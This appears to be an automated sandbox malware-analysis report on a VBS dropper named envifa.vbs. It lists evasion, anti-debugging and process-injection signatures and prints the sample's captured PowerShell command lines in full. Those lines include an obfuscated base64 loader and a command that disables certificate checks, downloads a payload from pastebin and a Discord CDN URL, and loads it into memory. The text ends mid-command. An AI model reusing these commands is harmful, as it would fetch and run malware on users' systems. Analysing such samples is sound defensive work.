                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0040F7A7 Sleep,ExitProcess,4_2_0040F7A7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,4_2_0041A748
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1279Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2094Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3598Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6177Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 2278Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 7200Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: foregroundWindowGot 1763Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7092Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3636Thread sleep count: 3598 > 30Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5320Thread sleep count: 6177 > 30Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5224Thread sleep time: -19369081277395017s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,4_2_00409253
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,4_2_0041C291
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,4_2_0040C34D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,4_2_00409665
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,4_2_0040880C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0040783C FindFirstFileW,FindNextFileW,4_2_0040783C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW,4_2_00419AF5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,4_2_0040BB30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,4_2_0040BD37
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00407C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,4_2_00407C97
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: RegSvcs.exe, 00000004.00000002.3014847261.0000000001228000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.3014847261.00000000011A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: powershell.exe, 00000003.00000002.1823955766.0000021A0ECE0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmtoolsd
                Source: powershell.exe, 00000003.00000002.1847991025.0000021A26B30000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeAPI call chain: ExitProcess graph end nodegraph_4-48338
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9B878891 CheckRemoteDebuggerPresent,3_2_00007FFD9B878891
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_004349F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_004349F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0041CB50 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,4_2_0041CB50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_004432B5 mov eax, dword ptr fs:[00000030h]4_2_004432B5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00412077 GetProcessHeap,HeapFree,4_2_00412077
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_004349F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_004349F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00434B47 SetUnhandledExceptionFilter,4_2_00434B47
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0043BB22 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_0043BB22
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00434FDC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_00434FDC

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: 3.2.powershell.exe.21a26ec0000.9.raw.unpack, NshbBG.csReference to suspicious API methods: ReadProcessMemory_API(processInformation.ProcessHandle, num3 + 8, ref buffer, 4, ref bytesWritten)
                Source: 3.2.powershell.exe.21a26ec0000.9.raw.unpack, NshbBG.csReference to suspicious API methods: VirtualAllocEx_API(processInformation.ProcessHandle, num4, length, 12288, 64)
                Source: 3.2.powershell.exe.21a26ec0000.9.raw.unpack, NshbBG.csReference to suspicious API methods: WriteProcessMemory_API(processInformation.ProcessHandle, num5, data, bufferSize, ref bytesWritten)
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 459000Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 471000Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 477000Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 478000Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 479000Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 47E000Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: F44008Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe4_2_004120F7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00419627 mouse_event,4_2_00419627
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $MkplqW = 'J Bs H cgBr Gw I 9 C Jw w Cc Ow k G0 a Bz GY bw g D0 I n CU c B6 EE YwBP Gc SQBu E0 cg l Cc OwBb FM eQBz HQ ZQBt C4 TgBl HQ LgBT GU cgB2 Gk YwBl F bwBp G4 d BN GE bgBh Gc ZQBy F0 Og 6 FM ZQBy HY ZQBy EM ZQBy HQ aQBm Gk YwBh HQ ZQBW GE b Bp GQ YQB0 Gk bwBu EM YQBs Gw YgBh GM aw g D0 I B7 CQ d By HU ZQB9 Ds WwBT Hk cwB0 GU bQ u E4 ZQB0 C4 UwBl HI dgBp GM ZQBQ G8 aQBu HQ TQBh G4 YQBn GU cgBd Do OgBT GU YwB1 HI aQB0 Hk U By G8 d Bv GM bwBs C PQ g Fs UwB5 HM d Bl G0 LgBO GU d u FM ZQBj HU cgBp HQ eQBQ HI bwB0 G8 YwBv Gw V B5 H ZQBd Do OgBU Gw cw x DI OwBb EI eQB0 GU WwBd F0 I k Ho Z Bt Hc a g D0 I Bb HM eQBz HQ ZQBt C4 QwBv G4 dgBl HI d Bd Do OgBG HI bwBt EI YQBz GU Ng 0 FM d By Gk bgBn Cg I o E4 ZQB3 C0 TwBi Go ZQBj HQ I BO GU d u Fc ZQBi EM b Bp GU bgB0 Ck LgBE G8 dwBu Gw bwBh GQ UwB0 HI aQBu Gc K g Cg TgBl Hc LQBP GI agBl GM d g E4 ZQB0 C4 VwBl GI QwBs Gk ZQBu HQ KQ u EQ bwB3 G4 b Bv GE Z BT HQ cgBp G4 Zw o Cc a B0 HQ c 6 C8 LwBw GE cwB0 GU YgBp G4 LgBj G8 bQ v HI YQB3 C8 Vg 5 Hk NQBR DU dgB2 Cc KQ g Ck I p Ds WwBz Hk cwB0 GU bQ u EE c Bw EQ bwBt GE aQBu F0 Og 6 EM dQBy HI ZQBu HQ R Bv G0 YQBp G4 LgBM G8 YQBk Cg J B6 GQ bQB3 Gg KQ u Ec ZQB0 FQ eQBw GU K n EM b Bh HM cwBM Gk YgBy GE cgB5 DM LgBD Gw YQBz HM MQ n Ck LgBH GU d BN GU d Bo G8 Z o Cc TQBz HE QgBJ GI WQ n Ck LgBJ G4 dgBv Gs ZQ o CQ bgB1 Gw b s C WwBv GI agBl GM d Bb F0 XQ g Cg Jw m DY O w GQ MQ 4 GU N Bm DM YgBm DY N 1 DY Yw x DM NgBh Dk M Bk DM MQ w GQ O 3 DE MgBh Dg NQBj DU O Bh DM OQ 5 DU Zg x GE Z 2 GI OQBj Dk MQ 1 DY Nw w GQ NgBk GE Yg x GE PQBt Gg JgBm Dg MQ 4 GQ O 2 DY PQBz Gk JgBm D MwBk GU O 2 DY PQB4 GU PwB0 Hg d u Dc Lg 5 Gk dgBu GU Lw 4 DM N 1 DQ Mg 2 DY MQ 2 DQ O x D Mw w DY Mg x C8 MQ 2 DI N x Dc OQ w DY Mg z DI Nw z DM NQ x DI MQ v HM d Bu GU bQBo GM YQB0 HQ YQ v G0 bwBj C4 c Bw GE Z By G8 YwBz Gk Z u G4 Z Bj C8 Lw 6 HM c B0 HQ a n C L g CQ bQBo HM ZgBv C L g Cc XwBf F8 XwBf GQ ZwBm F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf C0 LQ t C0 LQ t C0 Jw s C J Bs H cgBr Gw L g Cc MQ n Cw I n FI bwBk GE Jw g Ck KQ 7 ==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $MkplqW.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\Desktop\envifa.vbs');powershell -command $KByHL;Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$lprkl = '0';$mhsfo = 'C:\Users\user\Desktop\envifa.vbs';[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;[Byte[]] $zdmwh = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString( (New-Object Net.WebClient).DownloadString('http://pastebin.com/raw/V9y5Q5vv') ) );[system.AppDomain]::CurrentDomain.Load($zdmwh).GetType('ClassLibrary3.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('&680d18e4f3bf6456c136a90d310d8712a85c58a3995f1ad6b9c915670d6dab1a=mh&f818d866=si&f03de866=xe?txt.7.9ivne/8345426616481030621/1624179062327335121/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , $mhsfo , '_____dgf_______________________________________-------', $lprkl, '1', 'Roda' ));"Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $mkplqw = 'j bs h cgbr gw i 9 c jw w cc ow k g0 a bz gy bw g d0 i n cu c b6 ee ywbp gc sqbu e0 cg l cc owbb fm eqbz hq zqbt c4 tgbl hq lgbt gu cgb2 gk ywbl f bwbp g4 d bn ge bgbh gc zqby f0 og 6 fm zqby hy zqby em zqby hq aqbm gk ywbh hq zqbw ge b bp gq yqb0 gk bwbu em yqbs gw ygbh gm aw g d0 i b7 cq d by hu zqb9 ds wwbt hk cwb0 gu bq u e4 zqb0 c4 uwbl hi dgbp gm zqbq g8 aqbu hq tqbh g4 yqbn gu cgbd do ogbt gu ywb1 hi aqb0 hk u by g8 d bv gm bwbs c pq g fs uwb5 hm d bl g0 lgbo gu d u fm zqbj hu cgbp hq eqbq hi bwb0 g8 ywbv gw v b5 h zqbd do ogbu gw cw x di owbb ei eqb0 gu wwbd f0 i k ho z bt hc a g d0 i bb hm eqbz hq zqbt c4 qwbv g4 dgbl hi d bd do ogbg hi bwbt ei yqbz gu ng 0 fm d by gk bgbn cg i o e4 zqb3 c0 twbi go zqbj hq i bo gu d u fc zqbi em b bp gu bgb0 ck lgbe g8 dwbu gw bwbh gq uwb0 hi aqbu gc k g cg tgbl hc lqbp gi agbl gm d g e4 zqb0 c4 vwbl gi qwbs gk zqbu hq kq u eq bwb3 g4 b bv ge z bt hq cgbp g4 zw o cc a b0 hq c 6 c8 lwbw ge cwb0 gu ygbp g4 lgbj g8 bq v hi yqb3 c8 vg 5 hk nqbr du dgb2 cc kq g ck i p ds wwbz hk cwb0 gu bq u ee c bw eq bwbt ge aqbu f0 og 6 em dqby hi zqbu hq r bv g0 yqbp g4 lgbm g8 yqbk cg j b6 gq bqb3 gg kq u ec zqb0 fq eqbw gu k n em b bh hm cwbm gk ygby ge cgb5 dm lgbd gw yqbz hm mq n ck lgbh gu d bn gu d bo g8 z o cc tqbz he qgbj gi wq n ck lgbj g4 dgbv gs zq o cq bgb1 gw b s c wwbv gi agbl gm d bb f0 xq g cg jw m dy o w gq mq 4 gu n bm dm ygbm dy n 1 dy yw x dm ngbh dk m bk dm mq w gq o 3 de mgbh dg nqbj du o bh dm oq 5 du zg x ge z 2 gi oqbj dk mq 1 dy nw w gq ngbk ge yg x ge pqbt gg jgbm dg mq 4 gq o 2 dy pqbz gk jgbm d mwbk gu o 2 dy pqb4 gu pwb0 hg d u dc lg 5 gk dgbu gu lw 4 dm n 1 dq mg 2 dy mq 2 dq o x d mw w dy mg x c8 mq 2 di n x dc oq w dy mg z di nw z dm nq x di mq v hm d bu gu bqbo gm yqb0 hq yq v g0 bwbj c4 c bw ge z by g8 ywbz gk z u g4 z bj c8 lw 6 hm c b0 hq a n c l g cq bqbo hm zgbv c l g cc xwbf f8 xwbf gq zwbm f8 xwbf f8 xwbf f8 xwbf f8 xwbf f8 xwbf f8 xwbf f8 xwbf f8 xwbf f8 xwbf f8 xwbf f8 xwbf f8 xwbf f8 xwbf c0 lq t c0 lq t c0 jw s c j bs h cgbr gw l g cc mq n cw i n fi bwbk ge jw g ck kq 7 ==';$kbyhl = [system.text.encoding]::unicode.getstring( [system.convert]::frombase64string( $mkplqw.replace(' ','a') ) );$kbyhl = $kbyhl.replace('%pzacoginmr%', 'c:\users\user\desktop\envifa.vbs');powershell -command $kbyhl;
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "$lprkl = '0';$mhsfo = 'c:\users\user\desktop\envifa.vbs';[system.net.servicepointmanager]::servercertificatevalidationcallback = {$true};[system.net.servicepointmanager]::securityprotocol = [system.net.securityprotocoltype]::tls12;[byte[]] $zdmwh = [system.convert]::frombase64string( (new-object net.webclient).downloadstring( (new-object net.webclient).downloadstring('http://pastebin.com/raw/v9y5q5vv') ) );[system.appdomain]::currentdomain.load($zdmwh).gettype('classlibrary3.class1').getmethod('msqbiby').invoke($null, [object[]] ('&680d18e4f3bf6456c136a90d310d8712a85c58a3995f1ad6b9c915670d6dab1a=mh&f818d866=si&f03de866=xe?txt.7.9ivne/8345426616481030621/1624179062327335121/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , $mhsfo , '_____dgf_______________________________________-------', $lprkl, '1', 'roda' ));"
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $mkplqw = 'j bs h cgbr gw i 9 c jw w cc ow k g0 a bz gy bw g d0 i n cu c b6 ee ywbp gc sqbu e0 cg l cc owbb fm eqbz hq zqbt c4 tgbl hq lgbt gu cgb2 gk ywbl f bwbp g4 d bn ge bgbh gc zqby f0 og 6 fm zqby hy zqby em zqby hq aqbm gk ywbh hq zqbw ge b bp gq yqb0 gk bwbu em yqbs gw ygbh gm aw g d0 i b7 cq d by hu zqb9 ds wwbt hk cwb0 gu bq u e4 zqb0 c4 uwbl hi dgbp gm zqbq g8 aqbu hq tqbh g4 yqbn gu cgbd do ogbt gu ywb1 hi aqb0 hk u by g8 d bv gm bwbs c pq g fs uwb5 hm d bl g0 lgbo gu d u fm zqbj hu cgbp hq eqbq hi bwb0 g8 ywbv gw v b5 h zqbd do ogbu gw cw x di owbb ei eqb0 gu wwbd f0 i k ho z bt hc a g d0 i bb hm eqbz hq zqbt c4 qwbv g4 dgbl hi d bd do ogbg hi bwbt ei yqbz gu ng 0 fm d by gk bgbn cg i o e4 zqb3 c0 twbi go zqbj hq i bo gu d u fc zqbi em b bp gu bgb0 ck lgbe g8 dwbu gw bwbh gq uwb0 hi aqbu gc k g cg tgbl hc lqbp gi agbl gm d g e4 zqb0 c4 vwbl gi qwbs gk zqbu hq kq u eq bwb3 g4 b bv ge z bt hq cgbp g4 zw o cc a b0 hq c 6 c8 lwbw ge cwb0 gu ygbp g4 lgbj g8 bq v hi yqb3 c8 vg 5 hk nqbr du dgb2 cc kq g ck i p ds wwbz hk cwb0 gu bq u ee c bw eq bwbt ge aqbu f0 og 6 em dqby hi zqbu hq r bv g0 yqbp g4 lgbm g8 yqbk cg j b6 gq bqb3 gg kq u ec zqb0 fq eqbw gu k n em b bh hm cwbm gk ygby ge cgb5 dm lgbd gw yqbz hm mq n ck lgbh gu d bn gu d bo g8 z o cc tqbz he qgbj gi wq n ck lgbj g4 dgbv gs zq o cq bgb1 gw b s c wwbv gi agbl gm d bb f0 xq g cg jw m dy o w gq mq 4 gu n bm dm ygbm dy n 1 dy yw x dm ngbh dk m bk dm mq w gq o 3 de mgbh dg nqbj du o bh dm oq 5 du zg x ge z 2 gi oqbj dk mq 1 dy nw w gq ngbk ge yg x ge pqbt gg jgbm dg mq 4 gq o 2 dy pqbz gk jgbm d mwbk gu o 2 dy pqb4 gu pwb0 hg d u dc lg 5 gk dgbu gu lw 4 dm n 1 dq mg 2 dy mq 2 dq o x d mw w dy mg x c8 mq 2 di n x dc oq w dy mg z di nw z dm nq x di mq v hm d bu gu bqbo gm yqb0 hq yq v g0 bwbj c4 c bw ge z by g8 ywbz gk z u g4 z bj c8 lw 6 hm c b0 hq a n c l g cq bqbo hm zgbv c l g cc xwbf f8 xwbf gq zwbm f8 xwbf f8 xwbf f8 xwbf f8 xwbf f8 xwbf f8 xwbf f8 xwbf f8 xwbf f8 xwbf f8 xwbf f8 xwbf f8 xwbf f8 xwbf c0 lq t c0 lq t c0 jw s c j bs h cgbr gw l g cc mq n cw i n fi bwbk ge jw g ck kq 7 ==';$kbyhl = [system.text.encoding]::unicode.getstring( [system.convert]::frombase64string( $mkplqw.replace(' ','a') ) );$kbyhl = $kbyhl.replace('%pzacoginmr%', 'c:\users\user\desktop\envifa.vbs');powershell -command $kbyhl;Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "$lprkl = '0';$mhsfo = 'c:\users\user\desktop\envifa.vbs';[system.net.servicepointmanager]::servercertificatevalidationcallback = {$true};[system.net.servicepointmanager]::securityprotocol = [system.net.securityprotocoltype]::tls12;[byte[]] $zdmwh = [system.convert]::frombase64string( (new-object net.webclient).downloadstring( (new-object net.webclient).downloadstring('http://pastebin.com/raw/v9y5q5vv') ) );[system.appdomain]::currentdomain.load($zdmwh).gettype('classlibrary3.class1').getmethod('msqbiby').invoke($null, [object[]] 